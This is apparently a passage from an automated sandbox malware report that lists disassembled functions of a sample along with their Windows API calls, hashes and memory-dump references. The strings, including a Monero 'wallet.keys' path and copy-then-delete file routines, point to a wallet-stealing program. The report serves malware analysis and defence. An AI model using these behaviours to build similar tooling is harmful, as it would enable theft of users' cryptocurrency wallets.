                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 40a5647744fb2101c45fbb73d158a7e14f3fcbf069849a826de2040584609bf4
                              • Instruction ID: e8fb61e5ab5bfbef76e3ad74fed09a76a0ab1ac8e993d6fd0a7c7b8306c7f223
                              • Opcode Fuzzy Hash: 40a5647744fb2101c45fbb73d158a7e14f3fcbf069849a826de2040584609bf4
                              • Instruction Fuzzy Hash: 45118FB1A44205EFD724CF96DD8AF7BBBB8EB44B10F10426BF615A7280D77558088BE1
                              Function 00C69260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(007FE110,?,?,?,00C6140C,?,007FE110,00000000), ref: 00C6926C
                              • lstrcpyn.KERNEL32(00E9AB88,007FE110,007FE110,?,00C6140C,?,007FE110), ref: 00C69290
                              • lstrlen.KERNEL32(?,?,00C6140C,?,007FE110), ref: 00C692A7
                              • wsprintfA.USER32 ref: 00C692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0165195dfe05d98a8de49fdd3b2a80ca9966e0c6d393572e491927d86ef7770a
                              • Instruction ID: 343df05af107727d3ec6ef8998011e8979237cf4fcf000835395932723f1a0a4
                              • Opcode Fuzzy Hash: 0165195dfe05d98a8de49fdd3b2a80ca9966e0c6d393572e491927d86ef7770a
                              • Instruction Fuzzy Hash: F301E575500208FFCB04DFECC999EAE7BB9EF48350F188159F909AB200D631AA44DBD1
                              Function 00C512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C512D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C512F5
                              • RegCloseKey.ADVAPI32(?), ref: 00C512FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 6d269c7fa7daf298ff4e21bbfb02279f6513e74fa69e05fe1505e49f5d3cd5b8
                              • Instruction ID: b4bf8e9839a11acba9cddd642ab6b93499cbe0cf57250a8d3353a47a29c9b7bf
                              • Opcode Fuzzy Hash: 6d269c7fa7daf298ff4e21bbfb02279f6513e74fa69e05fe1505e49f5d3cd5b8
                              • Instruction Fuzzy Hash: 3F0112B9A40208BFDB14DFD1DC4DFAEB7B8EF48701F048156FA05A7280D6709A058B91
                              Function 00C6C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 6d8b57eab4bf58f9ca5bcf9bb7103136cf74d2d018686f7400833aca591ba828
                              • Instruction ID: 0119ba37aa4b45496fbd370b71274886bd2b266afc6d6d52433a5bc402ad6557
                              • Opcode Fuzzy Hash: 6d8b57eab4bf58f9ca5bcf9bb7103136cf74d2d018686f7400833aca591ba828
                              • Instruction Fuzzy Hash: 9B41C1B150079C5EDB318B24CCC4BFBBBE8AB45708F1844A8E9DA96182E2719B459F60
                              Function 00C66630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C66663
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C66726
                              • ExitProcess.KERNEL32 ref: 00C66755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 36864a37e2050538cd8124fbb27703b0d5fc266852c548767869effb4d81b1fa
                              • Instruction ID: 8f93e88838907034e9ff5572f8a1e456d2feb3ad501383992f83660733be6ed1
                              • Opcode Fuzzy Hash: 36864a37e2050538cd8124fbb27703b0d5fc266852c548767869effb4d81b1fa
                              • Instruction Fuzzy Hash: 99312BB1901218AEDB24EB90DCD6BDEB778AF08300F44419AF20976191DF746B48DFA6
                              Function 00C687C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C70E28,00000000,?), ref: 00C6882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68836
                              • wsprintfA.USER32 ref: 00C68850
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 564a9c8e93647d0544e2a6296af5fff71476be2933b8245d60e767482d084013
                              • Instruction ID: 964e3c084b04df16cd5e49ecebebdf5643e49fabadebc328f8d3552e086dbc8d
                              • Opcode Fuzzy Hash: 564a9c8e93647d0544e2a6296af5fff71476be2933b8245d60e767482d084013
                              • Instruction Fuzzy Hash: 8A212CB1A40208AFDB14DF95DD49FAEBBB8FF48701F14416AF605B7280C779A9048BA1
                              Function 00C68D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C6951E,00000000), ref: 00C68D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68D62
                              • wsprintfW.USER32 ref: 00C68D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 7b2ad9a345411646f3c0e1f4e883ef2fca387721e497bd68ebe4f64310d68614
                              • Instruction ID: 6df997e6e0538e401d6826f5017bc368a0b67205a607c3dc8f16b9c6afe59639
                              • Opcode Fuzzy Hash: 7b2ad9a345411646f3c0e1f4e883ef2fca387721e497bd68ebe4f64310d68614
                              • Instruction Fuzzy Hash: 86E046B0A40208BFC714DB95DC0EA6977B8EB04702F0440A6F909A6280DA719A048B92
                              Function 00C5A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00C5A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00C5A6BC
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: d897fd8eaf3c62d5abb15ccd9c8ee8af41bddd233bcd3f064f5e911603e24a0d
                              • Instruction ID: 224913fb332c2b9d8928858f4b8cb07241515f84a14de31815b11ca7b3f0838e
                              • Opcode Fuzzy Hash: d897fd8eaf3c62d5abb15ccd9c8ee8af41bddd233bcd3f064f5e911603e24a0d
                              • Instruction Fuzzy Hash: CCE1ED728101089ADB25FBA5DDD6EEE7338AF18300F548169F51673092EF306A4DDFA6
                              Function 00C5D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5D481
                              • lstrlen.KERNEL32(00000000), ref: 00C5D698
                              • lstrlen.KERNEL32(00000000), ref: 00C5D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 5a6ef5badf41fee113f0065356e5724564e23135d7acb12807055c197f8df592
                              • Instruction ID: 4be4ff42dba8b6e2c293cbb266c4600461265b3a72abcab4578afa00af2e0d18
                              • Opcode Fuzzy Hash: 5a6ef5badf41fee113f0065356e5724564e23135d7acb12807055c197f8df592
                              • Instruction Fuzzy Hash: 4C91E1728101049ADB24FBA5DDD6EEE7338AF18300F544169F51777092EF346A49EFA2
                              Function 00C5D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5D801
                              • lstrlen.KERNEL32(00000000), ref: 00C5D99F
                              • lstrlen.KERNEL32(00000000), ref: 00C5D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 13b95496f466c43ed345b61a8673ebb4c4372390cd2181d702dad5b0b8269cde
                              • Instruction ID: 8863bae45839c76b47549358f29a4c1abfa48d02de9f162373f3d237bfe6aa68
                              • Opcode Fuzzy Hash: 13b95496f466c43ed345b61a8673ebb4c4372390cd2181d702dad5b0b8269cde
                              • Instruction Fuzzy Hash: 2881EF729101049ACB24FBA5DDD6EEE7338AF18300F544129F507B7092EE346A09EFA2
                              Function 00C5F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
